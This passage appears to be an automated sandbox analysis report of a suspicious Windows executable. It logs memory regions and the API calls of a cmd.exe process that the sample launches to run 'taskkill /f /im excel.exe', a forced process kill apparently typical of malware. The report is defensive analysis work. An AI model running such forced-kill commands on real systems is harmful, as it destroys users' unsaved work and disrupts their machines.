"c:\\windows\\system32\\wow64win.dll") Region: id = 4137 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4138 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4139 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4140 start_va = 0x470000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4141 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4142 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4143 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4144 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4145 start_va = 0x610000 end_va = 0x6cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4146 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4147 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4148 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 4149 start_va = 0x7d0000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 4150 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4151 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4152 start_va = 0x910000 end_va = 0xc46fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 293 os_tid = 0x554 [0204.347] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0204.347] __set_app_type (_Type=0x1) [0204.347] __p__fmode () returned 0x74974d6c [0204.347] __p__commode () returned 0x74975b1c [0204.348] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0204.348] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0204.348] GetCurrentThreadId () returned 0x554 [0204.348] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x554) returned 0x78 [0204.348] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0204.348] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0204.348] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.355] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.356] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0204.356] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.356] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0204.356] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0204.356] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.356] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0204.356] GetConsoleOutputCP () returned 0x1b5 [0204.357] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0204.357] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0204.357] _get_osfhandle (_FileHandle=1) returned 0x158 [0204.357] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0204.357] _get_osfhandle (_FileHandle=1) returned 0x158 [0204.357] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0204.357] _get_osfhandle (_FileHandle=0) returned 0x154 [0204.357] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0204.357] GetEnvironmentStringsW () returned 0x517cf8* [0204.358] GetProcessHeap () returned 0x510000 [0204.358] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa1a) returned 0x518720 [0204.358] FreeEnvironmentStringsA (penv="A") returned 1 [0204.358] GetProcessHeap () returned 0x510000 [0204.358] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4) returned 0x510578 [0204.358] GetEnvironmentStringsW () returned 0x517cf8* [0204.358] GetProcessHeap () returned 0x510000 [0204.358] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa1a) returned 0x519148 [0204.358] FreeEnvironmentStringsA (penv="A") returned 1 [0204.358] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0204.359] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0204.359] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0204.359] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0204.359] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0204.359] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0204.359] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0204.359] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0204.359] RegCloseKey (hKey=0x88) returned 0x0 [0204.359] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0204.359] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0204.359] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0204.359] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0204.359] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0204.360] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0204.360] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0204.360] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0204.360] RegCloseKey (hKey=0x88) returned 0x0 [0204.360] time (in: timer=0x0 | out: timer=0x0) returned 0x6234423a [0204.360] srand (_Seed=0x6234423a) [0204.360] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im excel.exe \"" [0204.360] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im excel.exe \"" [0204.360] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0204.360] GetProcessHeap () returned 0x510000 [0204.360] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x210) returned 0x519b70 [0204.360] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x519b78, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0204.360] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0204.360] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0204.360] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.360] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0204.361] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0204.361] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0204.361] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0204.361] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0204.361] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0204.361] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0204.361] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0204.361] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0204.361] GetProcessHeap () returned 0x510000 [0204.362] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x518720) returned 1 [0204.362] GetEnvironmentStringsW () returned 0x517cf8* [0204.362] GetProcessHeap () returned 0x510000 [0204.362] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa32) returned 0x51a7c8 [0204.362] FreeEnvironmentStringsA (penv="A") returned 1 [0204.362] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0204.362] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.362] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0204.362] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0204.362] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0204.362] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0204.362] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0204.362] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0204.362] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0204.362] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0204.362] GetProcessHeap () returned 0x510000 [0204.362] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x44) returned 0x5104e8 [0204.362] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0204.363] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0204.363] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0204.363] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5105c8 [0204.363] FindClose (in: hFindFile=0x5105c8 | out: hFindFile=0x5105c8) returned 1 [0204.363] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x5105c8 [0204.363] FindClose (in: hFindFile=0x5105c8 | out: hFindFile=0x5105c8) returned 1 [0204.363] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0204.363] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5105c8 [0204.364] FindClose (in: hFindFile=0x5105c8 | out: hFindFile=0x5105c8) returned 1 [0204.364] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0204.364] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0204.364] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0204.364] GetProcessHeap () returned 0x510000 [0204.364] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x51a7c8) returned 1 [0204.364] GetEnvironmentStringsW () returned 0x517cf8* [0204.364] GetProcessHeap () returned 0x510000 [0204.364] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa76) returned 0x519d88 [0204.364] FreeEnvironmentStringsA (penv="=") returned 1 [0204.364] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0204.364] GetProcessHeap () returned 0x510000 [0204.365] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5104e8) returned 1 [0204.365] GetProcessHeap () returned 0x510000 [0204.365] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x400e) returned 0x51bc88 [0204.366] GetProcessHeap () returned 0x510000 [0204.366] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x46) returned 0x5104e8 [0204.366] GetProcessHeap () returned 0x510000 [0204.366] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4008) returned 0x51fca0 [0204.366] GetProcessHeap () returned 0x510000 [0204.366] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4008) returned 0x523cb0 [0204.367] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0204.368] GetProcessHeap () returned 0x510000 [0204.368] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x418) returned 0x51a808 [0204.368] SetErrorMode (uMode=0x0) returned 0x8003 [0204.368] SetErrorMode (uMode=0x1) returned 0x0 [0204.368] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x51a810, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0204.368] SetErrorMode (uMode=0x8003) returned 0x1 [0204.368] GetProcessHeap () returned 0x510000 [0204.368] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x51a808, Size=0x78) returned 0x51a808 [0204.368] GetProcessHeap () returned 0x510000 [0204.368] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51a808) returned 0x78 [0204.368] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0204.368] GetProcessHeap () returned 0x510000 [0204.368] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x62) returned 0x51a888 [0204.368] GetProcessHeap () returned 0x510000 [0204.368] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb8) returned 0x51a8f8 [0204.369] GetProcessHeap () returned 0x510000 [0204.369] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x51a8f8, Size=0x62) returned 0x51a8f8 [0204.369] GetProcessHeap () returned 0x510000 [0204.369] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51a8f8) returned 0x62 [0204.369] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0204.369] GetProcessHeap () returned 0x510000 [0204.369] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xe0) returned 0x51a968 [0204.374] GetProcessHeap () returned 0x510000 [0204.374] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x51a968, Size=0x76) returned 0x51a968 [0204.374] GetProcessHeap () returned 0x510000 [0204.374] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51a968) returned 0x76 [0204.374] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.375] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im excel.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0204.375] GetLastError () returned 0x3 [0204.375] GetProcessHeap () returned 0x510000 [0204.376] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x51fca0) returned 1 [0204.376] GetProcessHeap () returned 0x510000 [0204.376] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x523cb0) returned 1 [0204.376] GetProcessHeap () returned 0x510000 [0204.376] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x51bc88) returned 1 [0204.377] GetConsoleOutputCP () returned 0x1b5 [0204.379] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0204.379] GetUserDefaultLCID () returned 0x409 [0204.379] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0204.379] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0204.379] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0204.379] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0204.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0204.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0204.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0204.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0204.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0204.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0204.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0204.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0204.380] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0204.380] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0204.380] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0204.382] GetProcessHeap () returned 0x510000 [0204.382] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20c) returned 0x51aa30 [0204.382] GetConsoleTitleW (in: lpConsoleTitle=0x51aa30, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0204.384] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0204.384] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0204.384] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0204.384] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0204.385] GetProcessHeap () returned 0x510000 [0204.385] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x400a) returned 0x51bc88 [0204.385] GetProcessHeap () returned 0x510000 [0204.385] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x51bc88) returned 1 [0204.386] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0204.386] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0204.386] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0204.386] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0204.386] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0204.386] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0204.386] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0204.386] GetProcessHeap () returned 0x510000 [0204.386] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x58) returned 0x51ac48 [0204.386] GetProcessHeap () returned 0x510000 [0204.386] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1a) returned 0x51aca8 [0204.388] GetProcessHeap () returned 0x510000 [0204.388] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2e) returned 0x51acd0 [0204.389] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0204.397] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0204.397] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0204.397] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0204.397] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0204.397] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0204.397] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0204.397] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0204.397] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0204.397] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0204.398] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0204.398] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0204.398] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0204.398] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0204.398] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0204.398] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0204.398] _wcsicmp 